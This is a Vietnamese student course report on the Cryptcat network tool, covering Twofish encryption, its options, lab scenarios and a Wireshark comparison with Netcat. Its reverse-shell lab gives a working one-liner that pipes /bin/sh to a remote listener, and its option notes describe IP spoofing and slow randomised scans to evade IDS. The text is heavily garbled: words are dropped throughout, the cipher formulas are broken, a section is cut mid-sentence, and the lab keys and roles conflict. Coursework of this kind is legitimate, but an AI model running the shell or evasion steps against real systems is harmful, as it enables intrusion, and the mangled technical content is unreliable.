HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THƠNG TIN Học phần: An tồn mạng Bài báo cáo: Tìm hiểu cơng cụ Cryptcat Giảng viên hướng dẫn: Sinh viên thực hiện: Họ tên: Mã sinh viên: TS Đặng Minh Tuấn Nhóm Nguyễn Minh Hồng B18DCAT100 Hà Nội ,tháng 12 năm 2021 Mục lục Danh Mục Hình Vẽ Lời Mở Đầu .4 Chương I: Giới thiệu Crytcat I Cryptcat gì? II Chức Cryptcat: III Khái quát mã hoá Twofish: .6 Chương 2: Cách cài đặt hướng dẫn sử dụng Cryptcat: 13 I Cách cài đặt Cryptcat: .13 1.1 Cách cài đặt Crypcat Kali Linux: 13 1.3 Xác nhận việc cài đặt: .14 II Hướng dẫn sử dụng: 15 Cryptcat Command Option: 15 Chương 3: Các lab, kịch 18 I Trò chuyện: .18 II Chế độ dài dòng (Verbose mode): 19 III Bảo vệ mật khẩu: 20 IV Cổng ngẫu nhiên: 21 V Thời gian chờ thời gian trễ: 22 VI Reverse shell: 23 Chương 5: So sánh Cryptcat Netcat 25 I Netcat: .25 II Cryptcat: 27 Kết Luận 29 Danh Mục Tài Liệu Tham Khảo 30 Danh Mục Hình Vẽ Hình Sơ đồ thuật toán Twofish Hình Sơ đồ miêu tả sinh S-Box Twofish .9 Hình Q trình sinh khóa Twofish 11 Hình Cài đặt Cryptcat Windows 14 Hình Chạy Cryptcat Windows 14 Hình Chạy Cryptcat Kali Linux 15 Hình Khởi tạo chết độ chat .18 Hình Người nghe chết độ chat 19 Hình Người nghe chế độ Verbose .19 Hình 10 Khởi tạo chế độ Verbose 20 Hình 11 Người nghe chế độ mật 20 Hình 12 Khởi tạo chế độ mật 21 Hình 13 Người nghe chết độ cổng ngẫu nhiên 21 Hình 14 Người nghe chế độ thời gian trễ 22 Hình 15 Khởi tạo chế độ thời gian trễ 23 Hình 16 Khởi tạo reverse shell 23 Hình 17 Thơng tin thu qua reverse shell 24 Hình 18 Wireshark bắt gói tin reverse shell 24 Hình 19 Khởi tạo chế độ chat Netcat 25 Hình 20 Bên nghe chế độ chat netcat 26 Hình 21 Wireshark bắt gói tin chat Netcat 26 Hình 22 Wireshark bắt gói tin chế độ chat Cryptcat .28 Lời Mở Đầu Cùng với bùng nổ thông tin đời nhiều phần mêm tiếng, trang web chuyên nghiệp bảo mật liệu thật cần thiết Một trang web muốn phát triển bền vững cần phải có cấu bảo mật thật vững chắc, an tồn liệu khơng thể thiếu Vì suốt q trình nghiên cứu tìm tịi, em tự chọn cho đề tài mà em nghĩ thiết yếu cho muốn tìm hiểu an tồn thơng tin, đề tài ko xa lạ với theo ngành công nghệ thông tin, cần quan tâm Trong suốt đề tài này, em trình bày nội dung chủ yếu cài đặt sử dụng công cụ Cryptcat Tool, cách chi tiết gọn gẽ Cryptcat sử dụng giải pháp đặc biệt để truyền file qua mạng cục Internet Nó hữu ích cho việc truyền liệu đến từ máy ảo container, chúng khơng bao gồm tính Người dùng chí sử dụng chế chép-dán hai thiết bị Chương I: Giới thiệu Crytcat I Cryptcat gì? Cryptcat phiên nhẹ netcat với khả mã hóa truyền tải tích hợp Nó thực thứ mà netcat làm bổ sung thêm mã hóa Twofish để bảo mật Theo trang web dự án, "Cryptcat tiện ích Unix đơn giản đọc ghi liệu qua kết nối mạng, sử dụng giao thức TCP UDP mã hóa liệu truyền Nó thiết kế để trở thành cơng cụ" back-end "đáng tin cậy sử dụng trực tiếp dễ dàng chương trình tập lệnh khác Đồng thời, công cụ gỡ lỗi khám phá mạng giàu tính năng, tạo hầu hết loại kết nối bạn cần có số khả tích hợp thú vị " Cryptcat sử dụng để gửi tệp tệp đến vị trí khác mạng Cryptcat tạo farm9 cấp phép với Giấy phép Công cộng GNU phiên 2.0 (GPLv2) II Chức Cryptcat: CryptCat hoạt động máy khách máy chủ TCP / UDP kết nối hoạt động lắng nghe cho ổ cắm Nó lấy mật thêm salt để mã hóa liệu gửi qua kết nối Nếu không cung cấp mật định, lấy mật mặc định Chúng ta khám phá hoạt động cách sử dụng cách khám phá tùy chọn có sẵn Cryptcat xác giới thiệu nó: Netcat + mã hóa Bạn mã hóa datapipe, proxy relay Tin tặc ẩn lưu lượng truy cập Netcat họ để quản trị viên tọc mạch phải làm nhiều việc nghe mạng để tìm hiểu xem định làm Trang chủ http://sourceforge.net/projects/cryptcat/ Cryptcat sử dụng phiên nâng cao mã hóa Twofish Dịng lệnh đối số giống Rõ ràng Cryptcat khơng q hữu ích cho việc quét cổng giao tiếp với dịch vụ khác khơng sử dụng mã hóa với Cryptcat Nhưng việc sử dụng Netcat bạn bao gồm phiên Netcat chạy ở chế độ lắng nghe phiên riêng biệt Netcat sử dụng để kết nối với nó, Cryptcat mang lại cho bạn lợi ích bổ sung việc đảm bảo kết nối Ở chức Cryptcat, chức mang tính bật Cryptcat, Cryptcat cịn làm nhiều Nhà phát triển liệt kê tất chức Cryptcat sau: Tính bản: * Kết nối đến, TCP UDP, đến từ cổng * Kiểm tra toàn chuyển tiếp / đảo ngược DNS, với cảnh báo thích hợp * Khả sử dụng cổng nguồn cục * Khả sử dụng địa nguồn mạng cấu hình cục * Tích hợp khả quét cổng, với ngẫu nhiên * Có thể đọc đối số dòng lệnh từ đầu vào tiêu chuẩn * Chế độ gửi chậm, dòng sau N giây * Kết xuất hex liệu truyền nhận * Khả cho phép dịch vụ chương trình khác thiết lập kết nối * Trình phản hồi tùy chọn Telnet Mới cho phiên Windows * Khả chạy mà không cần cửa sổ bảng điều khiển * Khả khởi động lại máy chủ đơn luồng để xử lý liên quan III Khái quát mã hoá Twofish: Crypcat sử dụng mã hoá khối Twofish để mã hố thơng điệp, tăng tính bảo mật cho thơng điệp Vì tìm hiểu qua chút thuật tốn mã hố Twofish Đặc điểm chung: thuật toán thiết kế dựa thuật toán Blowfish (được thiết kế dựa cấu trúc sở mạng Feistel) Twofish thuật tốn nhanh khơng u cầu nhiều nhớ thực Twofish bao gồm 16 vịng, tính đặc biệt sử dụng hộp S tính tốn trước phụ thuộc vào khóa, sử dụng khóa theo thời gian biểu tương đối phức tạp Trong thiết kế, thuật toán sử dụng số thành phần thiết kế khác – ví dụ biến đổi PHT (Pseudo-Hadamard Transform) họ mã SAFER Trên hầu hết phần mềm Twofish chậm chút so với Rijndael (với 128 bít khóa), có phần nhanh 256 bít khóa Các tác giả thuật tốn đề cập đến việc cơng thuật tốn vịng cơng liên quan đến khóa lên tới 10 vịng Trên thực tế (đến năm 2005) khơng có kiểu cơng lên thuật tốn hiệu kiểu cơng “tìm khóa theo phương pháp vét cạn – brute force key search” Miêu tả thuật tốn: Sơ đồ thuật tốn hình vẻ Ở đây, văn ban đầu đưa vào bốn từ 32 bit A, B, C, D Trước tham gia vào 16 vòng bốn từ XOR với bốn từ khóa K0 Kế đến thực tiếp 16 chu kỳ Trong chu kỳ, hai từ A, B liệu vào hàm g (đầu tiên từ B quay trái bit) Hàm g bao gồm bốn S–box (mỗi S–box byte) phụ thuộc khóa, theo sau bước trộn tuyến tính dựa ma trận MDS Kết hợp kết trả hai hàm g thông qua biến đổi tựa Hadamard (PHT) cộng thêm vào hai từ khóa (K2r+8 cho A K2r+9 cho B chu kỳ r) Sau hai kết XOR với hai từ C D (trước xor từ D với B, từ D quay trái bit sau XOR từ C với A, từ C quay phải bit) Kế đến hai từ A C, B D hoán đổi cho để thực chu kỳ Sau thực xong 16 chu kỳ, hoán chuyển trở lại hai từ A C, B D, cuối thực phép XOR bốn từ A, B, C, D với bốn từ khóa K4 cho bốn từ A’, B’, C’, D’ mã hóa Hình Sơ đồ thuật tốn Twofish Hàm F: Ở hàm F phép hoán vị phụ thuộc khóa gía trị 64 bít Hàm F nhận vào ba tham số, hai từ liệu vào R0 R1, số thứ tự r chu kỳ dùng để chọn khóa thích hợp R0 đưa qua hàm g để tạo T0 R1 quay sang trái bít, sau đưa qua hàm g để tạo T1 Tiếp theo T0 T1 được kết hợp sử dụng PHT cộng thêm hai từ bảng khóa mở rộng, hàm F biểu diễn chuỗi lệnh sau: T0=g(R0) T1=g(ROL(R1,8)) F0=(T0+T1+K2r+8)mod 232 F1=(T0+2T1+K2r+9)mod 232 (F0,F1) kết hàm F Hàm g: Hàm g trung tâm thuật toán Twofish Từ liệu đâu vào X chia thành byte Mỗi byte thực thông qua S–box phụ thuộc khóa Mỗi S–box đưa bit liệu vào đưa bit kết byte kết xem véc tơ có chiều dài GF(28) véc tơ nhân với ma trận MDS × (sử dụng trường GF(28) cho việc tính tốn) Véc tơ kết Z xem từ 32 bit kết hàm g Si S-box phụ thuộc vào khóa, ma trận MDS cho dạng Hexa sau: S-box phụ thuộc vào khóa: Mỗi S–box định nghĩa với 2, byte liệu đầu vào khóa phụ thuộc vào kích thước khóa Điều thực sau cho khóa 128 bit, miêu tả hình S0(x)=q1[q0[q0[x] S0,0] S1,0] S1(x)=q0[q0[q1[x] S0,1] S1,1] S2(x)=q1[q1[q0[x] S0,2] S1,2] S3(x)=q0[q1[q1[x] S0,3] S1,3] Hình Sơ đồ miêu tả sinh S-Box Twofish Phép hoán vị q0 q1: q0 q1 phép hoán vị cố định gía trị bít Nó xây dựng từ phép hốn vị bít khác Nếu gọi x giá trị đầu vào y giá trị đầu hốn vị xác định sau: a0,b0=[x/16], x mod 16 a1=a0 b0 b1=a0 (b0>>>1) 8a0 mod 16 a2,b2=t0[a1], t1[a1] a3=a2 b2 b3=a2 (b2>>>1) 8a2 mod 16 a4,b4=t2[a3], t3[b3] y=16b4+a4 t0,t1,t2,t3 S-box, xác định khác q0 q1 Trường hợp q0 t0,t1,t2,t3 cho sau: t0=[817D6F320B59ECA4] t1=[ECB81235F4A6709D] t2=[BA5E6D90C8F32471] t3=[D7F4126E9B3085CA] Trường hợp q1 t0,t1,t2,t3 cho sau: t0=[28BDF76E31940AC5] t1=[1E2B4C376DA5F908] t2=[4C75169A0ED82B3F] t3=[B951C3DE647F208A] Các giá trị Si,j: Cách xác định giá trị Si,j qua bước sau: Đầu tiên ta định nghĩa k=N/64, với N chiều dài khóa mật 128 hay 192 hay 256 Khóa M bao gồm 8k byte m0,…,m8k-1, byte biến đổi thành 2k từ 32 bít Ta xác định Mi sau: M i   m( 4i  j )  28 j , i  0, ,2k  j 0 Từ Mi ta xác định véc tơ có chiều dài k sau: Me=(M0,M2,…,M2k-2) Mo=(M1,M3,…,M2k-1) Một vector gồm k từ 32 bit thứ suy từ khóa cách lấy nhóm gồm byte khóa, xem nhóm byte vector GF(28) nhân vector với ma trận 4×8 RS Sau kết byte xem từ 32 bit Những từ kết hợp lại tạo thành vector thứ ba Được xác định sau:  m8i  m   i 1   Si ,   m8i        S i ,1   RS    m8i   S  m   i,2   8i     m8i    Si ,3   m   8i     m8i     01  A4 Ở RS cho sau: RS    02   A4 A4 56 C1 47 55 A 58 Si   Si , j  28 j , i  0, , k  j 0 S=(Sk-1,Sk-2,…,S0) 87 DB E  68 E 5 AE 3D 19   DB E 03  87 A 58 F 1E C A1 FC Các giá trị véc tơ thứ tính sau: 55 82 tuyến nguồn thông qua máy mà bạn có quyền kiểm sốt, bạn buộc gói quay trở lại địa máy chủ bạn thay hướng đến đích thực Lưu ý điều thường khơng hiệu hầu hết định tuyến bỏ qua tùy chọn định tuyến nguồn hầu hết lọc cổng tường lửa ghi lại nỗ lực bạn ° -G Tùy chọn cho phép bạn thay đổi địa IP danh sách tuyến –g bạn bước Bởi địa IP có kích thước byte, đối số xuất bội số bốn, đề cập đến địa IP danh sách tuyến đường, đề cập đến địa thứ hai, v.v Điều hữu ích để giả mạo phần danh sách định tuyến nguồn để làm cho trơng thể đến từ nơi khác Bằng cách đặt địa IP giả vào hai khe danh sách –g định trỏ 12, gói tin chuyển thẳng đến địa IP thứ ba danh sách định tuyến Tuy nhiên, nội dung gói thực tế chứa địa IP giả, khiến thể gói đến từ vị trí thực tế từ nơi khác Điều giúp che giấu nguồn gốc lưu lượng truy cập, phản hồi cố gắng đảo ngược tuyến đường qua địa IP giả mạo bạn ° -i Khoảng thời gian trễ, khoảng thời gian Cryptcat chờ lần gửi liệu Ví dụ: truyền tệp đến Cryptcat, Cryptcat đợi vài giây trước truyền dòng đầu vào Khi bạn sử dụng Cryptcat để hoạt động nhiều cổng máy chủ lưu trữ, Cryptcat đợi vài giây trước kết nối với cổng dịng Điều cho phép người dùng thực truyền liệu cơng vào dịch vụ trơng theo kịch giữ cho việc quét cổng tầm kiểm soát số hệ thống phát xâm nhập (IDS) quản trị viên hệ thống ° -l Tùy chọn bật / tắt chế độ “nghe” Cryptcat Tùy chọn phải sử dụng với tùy chọn –p để yêu cầu Cryptcat liên kết với cổng TCP bạn định đợi kết nối đến Thêm tùy chọn –u để sử dụng cổng UDP thay ° -L Tùy chọn này, có phiên Windows, tùy chọn “nghe” mạnh -l Nó yêu cầu Cryptcat khởi động lại chế độ lắng nghe với tùy chọn dịng lệnh tương tự sau kết nối bị đóng Điều cho phép Cryptcat chấp nhận kết nối tương lai mà không cần can thiệp người dùng, sau kết nối ban đầu bạn hoàn tất Giống –l, yêu cầu tùy chọn –p ° -n Tùy chọn yêu cầu Cryptcat không thực tra cứu tên máy chủ Nếu bạn sử dụng tùy chọn dòng lệnh, đảm bảo không định tên máy chủ làm đối số ° -o Tùy chọn thực kết xuất hex liệu lưu trữ hexfile Lệnh nc –o hexfile ghi lại liệu theo hai hướng bắt đầu dòng dấu ‘’ để biểu thị liệu đến tương ứng Để có kết xuất hex gồm liệu đến, bạn sử dụng nc –o < hexfile Để có kết xuất hex gồm liệu gửi đi, bạn sử dụng nc –o > hexfile ° -p Sử dụng tùy chọn để định số cổng cục mà Cryptcat nên sử dụng Đối số bắt buộc sử dụng tùy chọn –l –L Nếu khơng định cho kết nối đi, Cryptcat sử dụng cổng hệ thống cấp cho nó, giống hầu hết máy khách TCP UDP khác Hãy nhớ hộp Unix, người dùng root định số cổng 1024 ° -r Cryptcat chọn cổng cục từ xa ngẫu nhiên Điều hữu ích bạn sử dụng Cryptcat để lấy thông tin loạt cổng hệ thống bạn muốn kết hợp thứ tự cổng nguồn cổng đích để làm cho trơng giống quét cổng Khi tùy chọn sử dụng với tùy chọn –i khoảng thời gian đủ lớn, q trình qt cổng chí có hội không ý nhiều trừ quản trị viên hệ thống xem xét kỹ lưỡng ghi ° -s Chỉ định địa IP nguồn mà Cryptcat nên sử dụng thực kết nối Tùy chọn cho phép tin tặc thực số thủ thuật lút Đầu tiên, cho phép họ ẩn địa IP giả mạo người khác, để nhận thông tin chuyển đến địa giả mạo họ, họ cần sử dụng tùy chọn định tuyến nguồn –g Thứ hai, chế độ nghe, nhiều bạn "ràng buộc trước" trước dịch vụ nghe Tất dịch vụ TCP UDP liên kết với cổng, tất chúng liên kết với địa IP cụ thể Nhiều dịch vụ nghe tất giao diện có sẵn theo mặc định Ví dụ: Syslog lắng nghe cổng UDP 514 cho lưu lượng nhật ký hệ thống Tuy nhiên, bạn chạy Cryptcat để lắng nghe cổng 514 sử dụng –s để định địa IP nguồn, lưu lượng truy cập đến IP định chuyển đến Cryptcat nghe trước! Tại sao? Nếu ổ cắm định cổng địa IP, ưu tiên ổ cắm không liên kết với địa IP cụ thể ° -t Chỉ khả dụng Windows, biên dịch với tùy chọn TELNET, Cryptcat xử lý thương lượng tùy chọn telnet với máy chủ telnet, phản hồi với thông tin vô nghĩa, cho phép bạn nhận lời nhắc đăng nhập ° -u Báo cho Netcat sử dụng UDP thay TCP Hoạt động cho chế độ máy khách chế độ nghe ° -v Kiểm soát mức độ Cryptcat cho bạn biết làm Sử dụng no –v N Cryptcat lấy liệu mà nhận Một –v cho bạn biết địa mà kết nối ràng buộc có cố xảy –V thứ hai cho bạn biết lượng liệu gửi nhận kết thúc kết nối ° -w Kiểm soát thời gian Cryptcat đợi trước từ bỏ kết nối Nó cho Cryptcat biết phải đợi sau nhận EOF (phần cuối tệp) đầu vào chuẩn trước đóng kết nối Điều quan trọng bạn gửi lệnh qua Cryptcat đến máy chủ từ xa đổi lại lượng lớn liệu (ví dụ: gửi lệnh HTTP đến máy chủ web để tải xuống tệp lớn) ° -z Tùy chọn yêu cầu Cryptcat gửi đủ liệu để khám phá cổng phạm vi định bạn thực có thứ lắng nghe chúng Bây bạn có ý tưởng thứ mà Cryptcat làm, xem số ví dụ thực tế ngồi đời thực cách sử dụng tiện ích Chương 3: Các lab, kịch I Trò chuyện: CryptCat sử dụng để trị chuyện hai người dùng Chúng ta cần thiết lập kết nối ổn định trước trò chuyện Để làm điều này, cần hai hệ thống số hai hệ thống này, hệ thống người nghe hệ thống cịn lại người khởi xướng Vì vậy, giao tiếp thực từ hai đầu Ở đây, cố gắng tạo kịch trò chuyện hai người dùng với hệ điều hành giống Người khởi xướng: Để khởi tạo trình nghe Kali Linux, làm theo lệnh để tạo trình nghe: Hình Khởi tạo chết độ chat Người nghe: Để khởi tạo trình nghe Kali Linux, làm theo lệnh để tạo trình nghe: Hình Người nghe chết độ chat II Chế độ dài dòng (Verbose mode): Trong CryptCat, chế độ dài dịng bắt đầu cách sử dụng tham số [-v] Bây giờ, chế độ dài dịng tạo để tạo thơng tin mở rộng từ hành động Chúng ta thử chế trò chuyện với chế độ dài dịng Chúng ta thấy thêm [-v] vào lệnh CryptCat, hiển thị thơng tin q trình mà hiệu suất kết nối Ở phía người nghe: cryptcat -lvp 8880 Hình Người nghe chế độ Verbose Ở bên khởi xướng: cryptcat -v 192.168.52.131 8880 Hình 10 Khởi tạo chế độ Verbose III Bảo vệ mật khẩu: Trong CryptCat, bảo vệ kết nối trị chuyện mật mật áp dụng cách sử dụng tham số [-k] Chúng ta biết CryptCat cung cấp cho mã hóa đầu cuối, cách sử dụng tham số [-k], cung cấp lớp bảo vệ bổ sung cho kết nối Vì vậy, gần khơng thể giải mã kết nối Chúng ta áp dụng cho bảo vệ với lệnh sau Về phía người nghe, áp dụng tham số [-k] với mật khẩu: cryptcat -k hoangg -lvp 8880 Hình 11 Người nghe chế độ mật Về phía người khởi xướng, cần áp dụng mật người nghe áp dụng để kết nối với số kết nối: cryptcat –v –k hoangg 192.168.52.131 8880 Hình 12 Khởi tạo chế độ mật IV Cổng ngẫu nhiên: Nếu định số cổng để bắt đầu người nghe thiết lập kết nối CryptCat chúng tơi Vậy thì, CryptCat có tham số [-r] đặc biệt dành cho chúng ta, cung cấp cho cổng cục ngẫu nhiên Ta set cổng ngẫu nhiên cho bên phía người nghe trước: cryptcat -lv –r Hình 13 Người nghe chết độ cổng ngẫu nhiên Tuỳ theo người nghe chọn cổng áp dụng sang bên phía người khởi tạo: cryptcat -v 192.168.52.131 41083 V Thời gian chờ thời gian trễ: Hầu hết nhầm lẫn điều khoản Thời gian chờ coi thời gian để hồn thành nhiệm vụ chương trình Trong khoảng thời gian trễ khoảng thời gian hai yêu cầu tác vụ riêng lẻ Vì vậy, CryptCat, có tham số [-w] cho thời gian chờ [-i] cho khoảng thời gian trễ Để áp dụng hai tham số riêng lẻ để có kết mong muốn Về phía người nghe, áp dụng hai lần khoảng thời gian trễ: cryptcat -v -w 30 -i 10 -l -p 8080 Hình 14 Người nghe chế độ thời gian trễ Tại người bắt đầu, áp dụng thời gian chờ: cryptcat –v –w 192.168.52.131 8880 Hình 15 Khởi tạo chế độ thời gian trễ VI Reverse shell: Reverse shell loại shell máy mục tiêu giao tiếp trở lại máy công Máy công nhận kết nối thông qua cổng cách cung cấp mật Chúng ta sử dụng dịng lệnh để tạo reverse shell máy Kali Linux rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|cryptcat 192.168.52.131 8880 -k secretkey >/tmp/f Hình 16 Khởi tạo reverse shell Để kích hoạt trình nghe máy đích để lấy shell, sử dụng lệnh sau: Chúng ta chạy loạt lệnh để tạo số lưu lượng truy cập hai máy cryptcat -lvp 8880 -k mysecretkey Hình 17 Thơng tin thu qua reverse shell Một nhược điểm lớn ví dụ hiển thị bạn cần Cryptcat máy chủ đích đó, điều thường khơng xảy kịch giới thực Trong số trường hợp, Cryptcat có mặt, có cách để cài đặt nó, nhiều trường hợp, cần sử dụng cách thay để kết nối trở lại hộp công Sử dụng Wireshark để nắm bắt lưu lượng hai máy, chọn gói số gói chọn Theo dõi luồng TCP Luồng cho thấy loạt ký tự ngẫu nhiên đọc Điều có nghĩa giao tiếp thực CryptCat mã hóa Đây điểm ưu việt Cryptcat so với Netcat Mọi lưu lượng hai máy cryptcat mã hoá phương pháp mã hố khối twofish Nó làm tăng tính bảo mật cho kết nối hai bên, kể có nghe đường truyền, hacker khơng thể biết giao tiếp thơng tin Hình 18 Wireshark bắt gói tin reverse shell Chương 5: So sánh Cryptcat Netcat Trước so sánh hai trước, cần biết Netcat nc Nó cơng cụ tiện ích sử dụng kết nối TCP UDP để đọc ghi mạng Nó sử dụng cho mục đích bảo mật hack Trong trường hợp hack, sử dụng với trợ giúp tập lệnh khiến đáng tin cậy Và cần nói bảo mật, giúp gỡ lỗi mạng với việc đầu tư vào mạng Và nói đến CryptCat, phiên nâng cao Netcat Nó cung cấp cho chúng tơi mã hóa hai chiều giúp kết nối chúng tơi an tồn Chúng tơi so sánh hai cơng cụ tuyệt vời dựa mã hóa kết nối tính trị chuyện cách chặn giao diện mạng chúng với trợ giúp Wireshark I Netcat: Như biết, áp dụng người nghe người khởi xướng để bắt đầu kết nối để trò chuyện Cùng với đó, chúng tơi khởi xướng Wireshark để chặn giao diện mạng Về phía người nghe, chúng tơi sử dụng tham số [-l] để nghe tham số [p] cho số cổng: Hình 19 Khởi tạo chế độ chat Netcat Về phía người khởi xướng, chúng tơi cần cung cấp số cổng, với Địa IP người nghe Hình 20 Bên nghe chế độ chat netcat Bây giờ, phải kiểm tra xem Wireshark chúng tơi bắt thứ hay khơng Như thấy chặn mạng thành công xem mạng trị chuyện Hình 21 Wireshark bắt gói tin chat Netcat II Cryptcat: Trong Cryptcat, biết cung cấp cho mã hóa hai chiều Điều làm cho mạng kết nối an toàn Netcat Nhưng cần kiểm tra điều cách chặn trị chuyện với giúp đỡ Wireshark Đối với kết nối đó, cần người nghe người khởi xướng để kết nối kết nối Tại máy người nghe, sử dụng tham số [-p] cho cổng [-l] để khởi tạo trình nghe Ở phía người khởi tạo, cần cung cấp Địa IP với số cổng người nghe: Bây kiểm tra xem chúng tơi có điều hay khơng Như thấy trò chuyện chế độ mã hóa Hình 22 Wireshark bắt gói tin chế độ chat Cryptcat Đó khác biệt Netcat Cryptcat Một cung cấp mã hóa mạng khơng Một số người nói CryptCat = mã hóa + Netcat Kết Luận Đến bạn có ý tưởng tốt việc CryptCat dùng để làm Đây cơng cụ đa hữu ích để chẩn đoán cố xác minh chức cấp sở hoạt động xác với kết nối TCP / UDP Đây cịn cơng cụ gỡ lỗi khám phá mạng giàu tính năng, tạo hầu hết loại kết nối bạn cần có số khả tích hợp thú vị Sử dụng CryptCat, bạn giao tiếp máy tính khác dễ dàng để tương tác nhanh chóng CryptCat cố gắng làm cho tương tác mạng trở nên minh bạch máy tính cách loại bỏ phức tạp việc hình thành kết nối Để đảm bảo an tồn, đến lúc loại bỏ netcat sử dụng cryptcat thay Với bảo mật twofish, cryptcat làm khó hacker nghe đường truyền, đáp ứng tính bảo mật liệu đường truyền Danh Mục Tài Liệu Tham Khảo [1] M Shema, D Chris , C David and P Aaron , Anti-Hacker Tool Kit, Third Edition, McGraw-Hill Osborne Media, March 1, 2006 [2] R Chandel, "Comprehensive Guide on CryptCat," April 2020 [Online] Available: https://www.hackingarticles.in/comprehensive-guide-on-cryptcat/ [3] B GANESH, "Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows machine," 13 July 2019 [Online] Available: https://gbhackers.com/netcat-vs-cryptcat/ [4] H TUTORIALS, "Hacking with Netcat part 2: Bind and reverse shells," 15 NOVEMBER 2016 [Online] Available: https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bindreverse-shells/ [5] Tutonics, "Encrypted Data Transfer Using Cryptcat," 2021 [Online] Available: https://tutonics.com/2012/05/encrypted-data-transfer-using-cryptcat.html ... nghe chọn cổng áp dụng sang bên phía người khởi tạo: cryptcat -v 192.168.52.131 41083 V Thời gian chờ thời gian trễ: Hầu hết nhầm lẫn điều khoản Thời gian chờ coi thời gian để hồn thành nhiệm vụ... thấy chặn mạng thành công xem mạng trị chuyện Hình 21 Wireshark bắt gói tin chat Netcat II Cryptcat: Trong Cryptcat, biết cung cấp cho mã hóa hai chiều Điều làm cho mạng kết nối an toàn Netcat... chương trình Trong khoảng thời gian trễ khoảng thời gian hai yêu cầu tác vụ riêng lẻ Vì vậy, CryptCat, có tham số [-w] cho thời gian chờ [-i] cho khoảng thời gian trễ Để áp dụng hai tham số riêng